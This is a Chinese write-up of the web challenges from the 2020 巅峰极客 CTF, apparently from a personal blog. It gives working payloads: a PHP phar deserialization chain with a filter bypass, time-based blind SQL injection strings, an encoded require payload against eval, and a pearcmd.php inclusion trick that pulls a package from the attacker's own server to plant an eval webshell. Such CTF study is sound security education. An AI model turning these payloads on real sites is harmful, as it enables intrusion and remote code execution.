巅峰极客2020 Web部分Wp

(●’◡’●)(●’◡’●)(●’◡’●)

一、babyphhp2

考点:phar反序列化

0FB8w4.png

源码很简单,上传功能,读文件功能,登录功能(没用,不用登录就能上传和读文件)

很明显的上传phar反序列化然后触发反序列化链

user类中有__tostring()方法

1
2
3
4
5
6
7
8
public function __toString()
{
    $this->nickname->backup=$this->backup; //
    $user = new User();
    $user->id = $_SESSION['id'];
    $user->nickname = $_SESSION['token'];
    return serialize($user);
}

dbCtrl类中有字符串判断,$token变量可控

1
2
3
if ($this->token=='admin') {
    return $idResult;
}

Reader类中有__set()方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Class Reader{
    public $filename;
    public $result;
    public function read($filename){
        if (preg_match("/flag/i",$filename)){
            die("想多了嗷");
        }
        if (preg_match("/sh/i",$filename)){
            die("nooooooooooo!");
        }
        if (preg_match("/^php|^file|^gopher|^http|^https|^ftp|^data|^phar|^smtp|^dict|^zip/i",$filename)){
            die("Invid Schema!");
        }
        echo file_get_contents($filename);
    }
    public function __set($name,$val){
        echo file_get_contents($val);
}
}

简单的链子就这三步,dbCtrl->token触发user->__tostring()

__tostring中

$this->nickname->backup=$this->backup;

再触发Reader->__set()读文件。

Phar.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
Class Reader
{
	public $filename;
    public $result;
}

class dbCtrl
{
    public $token;

    public function __construct()
    {
        $this->token = new User();
    }
}

class User
{	public $id;
    public $age=null;
    public $nickname = null;
    public $backup;

    public function __construct()
    {
        $this->nickname = new Reader();
        $this->backup = '/flag';
    }
}

$A=new dbCtrl();

$filename = 'poc.phar';
@unlink("poc.phar");
$phar=new Phar($filename);
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($A);
$phar->addFromString("foo.txt","bar");
$phar->stopBuffering();
?>

在upload和read处均有过滤waf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Class Upload{
    public $flag;
    public $file;
    public $ext;
    function __construct(){
        $this->flag = 1;
        $this->black_list = ['ph', 'ht', 'sh', 'pe', 'j', '=', 'co', '\\', '"', '\''];
    }
    function check(){
        $ext = substr($_FILES['file']['name'], strpos($_FILES['file']['name'], '.'));
        $reg=implode("|",$this->black_list);
        $reg = "/" . $reg . "\x|\s|[\x01-\x20]/i";
        if(preg_match($reg, $ext)){
            $this->flag = 0;
        }
        $this->ext = $ext;
    }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Class Reader{
    public $filename;
    public $result;
    public function read($filename){
        if (preg_match("/flag/i",$filename)){
            die("想多了嗷");
        }
        if (preg_match("/sh/i",$filename)){
            die("nooooooooooo!");
        }
        if (preg_match("/^php|^file|^gopher|^http|^https|^ftp|^data|^phar|^smtp|^dict|^zip/i",$filename)){
            die("Invid Schema!");
        }
        echo file_get_contents($filename);
    }
    public function __set($name,$val){
        echo file_get_contents($val);
}
}

upload处可以改后缀绕过,read处可用compress.zlib://绕过对schema的检测

将生成的phar文件改后缀为.txt上传,然后用phar://读取这个文件触发反序列化

compress.zlib://phar:///var/www/html/upload/dca4c919e572dc68bcf4c54d892402dd.txt

0Frhdg.png

二、easyflask

在name处找到未过滤的ssti

找到任意一个已经被init初始化过的类都可以

0FsFOK.png

这些子类都能利用

0FseFH.png

读flag

0FsnfA.png

三、babyback

存在盲注,老考点了,转义符转义username引号然后盲注

username=\&password=or if((ascii(substr((password),1,1))<120),sleep(2),1)#

注入出密码后,后台是一个eval($cmd.’=FALSE’)命令执行,ban掉了很多东西,但是可以用 require 和 这个结构

payload:

command=?><?=require%0a~%D0%99%93%9E%98?%3E

或者

command=require%40%7e%D0%99%93%9E%98?%3E (@~/flag的取反)

四、meow world

环境已经关闭,参考Nep战队师傅们的WP和部分截图

有个国外WP

https://khack40.info/camp-ctf-2015-trolol-web-write-up/

主要代码:

1
2
3
4
<?php
$f=$_GET['f']??"home";
include("{$f}.php");
?>

正常情况下应该不会存在恶意包含问题

但是php.ini中开启了register_argc_argv

环境中也像上面国外那篇WP一样有pearcmd.php

0Fyrvt.png

因此,get传入的参数可以直接传入到$_SERVER['argv'] 中,并且通过+可以达到传入数组的效果

0Fyx2R.png

根据上面文章思路,可以知道,首先要上传一个包,然后通过这个包来getshell

下载压缩包文件

http://download.pear.php.net/package/Archive_Tar-1.4.0.tgz

0F6VGd.png

可以写一个 shell 到 Archive/eval.php

1
2
3
<?php
	@eval($_POST['cmd']);
?>

0F6LOP.png

修改package.xml

0F6NMq.png

0F6wZT.png

1
2
3
4
5
6
7
<contents>
 <dir name="/">
  <file baseinstalldir="/" md5sum="89b230679f31da6f8dbdea25095f4ca9" name="Archive/Tar.php" role="php" />
    <file --------------------你的木马的信息--------------------- />
  <file baseinstalldir="/" md5sum="2fb90f0be7089a45c09a0d1182792419" name="docs/Archive_Tar.txt" role="doc" />
 </dir>
</contents>

然后把修改好的这个包部署在远程的 vps 上面,然后访问 

1
2
http://eci-2ze3abghqdfs09uu926n.cloudeci1.ichunqiu.com/index.php? 
f=pearcmd&list+install+--installroot+/tmp/+http://ip:port/upload.tar.gz

再通过报错找到package存放的位置

0Fcr0f.png

并且插件的位置是存放在这个路径的 doc 目录下的。所以访问

1
http://eci-2ze3abghqdfs09uu926n.cloudeci1.ichunqiu.com/index.php?f=/tmp/usr/local/lib/php/doc/Archive_Tar/Archive/eval

0Fcbh4.png

蚁剑连接上去后,发现/readflag.c是一个计算题

用师傅们的perl脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
use strict; 
use IPC::Open3; 
my $pid = open3( \*CHLD_IN, \*CHLD_OUT, \*CHLD_ERR, '/readflag' ) 
or die "open3() failed $!"; 
my $r; 
$r = <CHLD_OUT>; 
$r =substr($r,0,11); 
$r = eval "$r"; 
print CHLD_IN "$r\n"; 
$r = <CHLD_OUT>; 
print "$r"; 
$r = <CHLD_OUT>; 
print "$r";

0FgJuq.png

本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

摸爬滚打学习的web菜狗